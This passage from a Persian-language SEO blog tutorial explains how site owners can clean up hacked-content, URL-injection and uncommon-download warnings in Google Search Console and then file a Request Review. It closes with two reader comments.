مرحله چهارم: پس از اطمینان از رفع این مشکل امنیتی میتوانید در گزارش سرچ کنسول با انتخاب گزینه Request Review از گوگل مجدد درخواست کنید که صفحات شما را بررسی کند.
8- مشکل امنیتی Hacked: Content injection
اگر در گزارش Security Issues سرچ کنسول خطای امنیتی Content injection را دریافت میکنید بدانید که در بخشی از سایتتان یکسری لینک یا متون اسپم که هیچ ارتباطی با محتوای فعلی وبسایت شما ندارند اضافه شدهاست. شاید بپرسید هکرها از چگونه دست به چنین کاری زدهاند، احتمالات پیش روی شما:
- دسترسی یکی از دایرکتوریهای سرور سایت باز است و همین دایرکتوری ناامن به هکر فرصت نفوذ دادهاست.
- نرم افزاری که روی سایت نصب کردهاید نقاطی آسیپ پذیر داشته، این نرم افزار میتواند یک CMS مثل جوملا یا وردپرس باشد. پس همیشه از آخرین نسخه نرم افزارها استفاده کنید.
- هک یکی از افزونه های شخص ثالث سایت یکی از روشهای رایج نفوذ به سایت است (مثل افزونه شمارش تعداد بازدیدکنندگان)
نحوه رفع خطا Hacked: Content injection سرچ کنسول
مرحله اول: صفحات آلوده به محتوای مخرب را از روشهای امن بررسی کنید. بدین منظور میتوانید به برخی از آدرسهایی که در Sample URLs پیشنهاد شدهاند مراجعه نمایید.
مرحله دوم: به فچ کردن تک تک صفحات سایت ادامه دهید و به دنبال لینک یا متونی بگردید که اطمینان دارید که خودتان اضافه نکردهاید.
مرحله سوم: در مرحله بعدی نوبت پاکسازی سایت است که گوگل عزیز در این لینک به طور جامع در مورد نحوه پاکسازی سایت توضیح دادهاست. در این مرحله میتوانید فایلهای آسیب دیده را با آخرین نسخه بکاپ جایگزین کنید یا محتوای اسپم را خودتان حذف کنید.
مرحله چهارم: پس از اطمینان از رفع باگهای امنیتی و حذف لینک و متون اسپم باید در گزارش سرچ کنسول با انتخاب گزینه Request Review از گوگل مجدد درخواست کنید که صفحات شما را بررسی کند.
9- مشکل امنیتی Hacked: URL injection
نفوذ به سایت و افزودن محتوای مخرب همیشه به ریدایرکت یا لینکهای الوده خلاصه نمیشود، حتی در مواردی دیده شده که هکرها در سایت قربانی یکسری صفحات جدید میسازند و از این طریق هر محتوا و لینک آلودهای را وارد سایت میکنند. این مشکل امنیتی وقتی خطرناک میشود که وبسرور سایت قربانی برای حملات به سایتهای دیگر مورد سوء استفاده قرار میگیرد.
آموزش رفع خطا Hacked: URL injection سرچ کنسول:
مرحله اول: از یکی از روشهای امن آدرسهایی که در قسمت sample URLs این خطا ارائه شدهاست مورد بررسی قرار دهید. احتمالا این صفحات توسط شما ساخته نشدهاست پس آن ها را حذف کنید یا کدی که باعث شده این صفحات به صورت خودکار تولید شوند را شناسایی و حذف کنید. این ویدئو و مقاله جامع از سایت گوگل بسیار به شما کمک میکند.
مرحله دوم: برای یافتن صفحاتی که خودتان نساختهاید سه راه حل دارید:
-
- اگر سایت کوچکی دارید کافیست با درج دستور site:domain.com تمامی آدرسهای سایتتان که در گوگل ایندکس شدهاست را ببینید.
- اگر سایت بزرگی دارید و بررسی تک تک صفحات ایندکس شده زمانبر میشود میتوانید با دستور site:domain.com word صفحاتی که دارای یکی از کلمات اسپم رایج است را پیدا کنید.
- چنانچه سایت بزرگی دارید و از سیستم مدیریت محتوای وردپرس استفاده میکنید میتوانید با استفاده از دستور site:domain.com/wp-admin/ تمامی صفحات ایندکس شده سایت را در بخش مدیریت سایت وردپرسی مشاهده نمایید.
- مرحله سوم: پس از رفع مشکلات فوق نسبت به پاکسازی سایت اقدام نمایید. در این مرحله میتوانید دایرکتوریهای آلوده سایت را با یکی از فایل های بکاپ سالم جایگزین کنید و یا اینکه تمام صفحات، فایل و توابعی که هکر از آن استفاده کرده را پاک کنید.
مرحله چهارم: پس از اطمینان از رفع باگهای امنیتی و حذف صفحات مخرب باید در گزارش سرچ کنسول با انتخاب گزینه Request Review از گوگل درخواست تجدید نظر کنید.
10- هشدار امنیتی Uncommon downloads
در صورت مشاهده این اخطار امنیتی شوکه نشوید. در بسیاری از موارد اگر سرویس Google Safe Browsing فایلهای دانلودی سایت را غیرمعمول شناسایی کند چنین اخطاری در بخش امنیت سرچ کنسول ثبت میشود. همچنین اگر به تازگی یکسری فایل برای دانلود در سایت قرار داده باشید یا تعداد دانلود یک فایل خیلی پایین باشد این هشدار امنیتی رایج است.
نحوه رفع هشدار امنیتی Uncommon downloads سرچ کنسول:
مرحله اول: با اسکن سایت خودتان در suucuri (لینک) و نصب یکی از قویترین افزونه های امنیت سایت (اگر سایت وردپرسی دارید) از بابت نبود مشکلات امنیتی و نقاط آسیپ پذیر اطمینان حاصل کنید.
مرحله دوم: اگر فکر میکنید که فایل دانلود سایت با دستورالعملهای گوگل (لینک) در تضاد نیست کافیست درخواست تجدیدنظر را از طریق گزینه Request Review سرچ کنسول ثبت کنید تا فایل های دانلودی سایت مجدد بررسی شوند. درهرصورت اگر مشکلی نباشد پس از چند روز این هشدار امنیتی نیز حذف میشود.
مرحله نهایی: درخواست تجدید نظر یا Request Review
بعد رفع تمام مشکلات لیست شده در گزارش Security Issues سرچ کنسول اول به خودتان تبریک بگویید ? و سپس روی گزینه Request Review کلیک کنید.
Request Review مثل یک بررسی مجدد و تجدیدنظر میماند و Google Safe Browsing را ملزم میسازد که مجدد سایت شما را اسکن کند.
هنگام ثبت درخواست تجدید نظر به نکات زیر توجه داشته باشید:
- نوع مشکل امنیتی را به طور دقیق شرح دهید.
- مراحلی که برای رفع مشکل امنیتی طی کردهاید ذکر کنید.
- مستندات نتیجه مراحلی که انجام دادهاید را ارائه دهید.
پس از ارسال درخواست تجدیدنظر یک ایمیل تأییدیه برای شما ارسال میشود، این نکته را مدنظر داشته باشید که پس از تأیید درخواست روند بازبینی رفع مشکلات امنیتی بین 1 الی 2 هفته طول می کشد.
نکته: هیچوقت قبل از فیکس خطا و هشارهای امنیتی درخواست Request Review را ثبت نکنید، چرا که بعد از رفع مشکلات امنیتی تا مدتی طولانی مثل 30 روز ممکن است که نتوانید Request Review را ثبت کنید.
جمع بندی
به پایان مقاله آموزش رفع مشکل امنیتی در سرچ کنسول گوگل رسیدیم. در این مطلب راجع به انواع مشکل امنیتی که ممکن است وبسایتهای مختلف گرفتار آن شوند صحبت کردیم. آموختیم که امنیت کاربران برای موتور جستجوی گوگل یک اولویت است؛ در نتیجه فرقی نمیکند که به عمد یا غیرعمد در سایت شما یکسری ساز و کارهای غیرامن و خطرناک درحال انجام بوده، در هرصورت هرطور که شده باید به رفع خطاهای امنیتی سایت بپردازید!
خطرناکترین و پیچیده ترین مشکلات امنیتی وبسایت آن دسته از مشکلات امنیتی میباشند که از طریق هک و نفوذ به سایت اتفاق افتادهاست. بنابراین در چنین مواردی علاوه بر حذف اقدامات هکر (مثل تعبیه بدافزار) باید به فکر یافتن باگ امنیتی سایت باشید تا مجدد آسیب نبینید.
چنانچه به صورت عملی تمایل به استفاده از آموزش سرچ کنسول دارید قطعا دوره دانلودی Search Console بهترین انتخاب شما خواهد بود. در نهایت اگر سوال و ابهامی در رابطه با گزارش Security Issues سرچ کنسول دارید حتما از ما بپرسید?
نویسنده مقاله: پرستو علیرضازاده / کارشناس تولید محتوا
ویرایش و سئو مقاله: پوریا آریافر / متخصص و مشاور سئو
2 پاسخ
سلام وقت بخیر
من مشکل Uncommon downloads رو دارم، طبق گفته شما سایت رو چک کردم و مشکل امنیتی نداشت. تقریبا تمام لینک ها رو چک کردم ولی هیچکدوم مشکل نداشت. هر بار درخواست Request Review رو میدم مشکل رفع میشه اما کمتر از 10 روز دوباره Uncommon downloads ظاهر میشه. اگر ممکنه کمک کنید بتونم مشکل رو رفع کنم
سلام
خیلی از این موارد ممکنه خطای خود سرچ کنسول باشه.
با این حال بهتره https://sitecheck.sucuri.net/ سایتت رو چک کنی باهاش.
به هاستت بگو سایتت رو یک اسکن بکنه.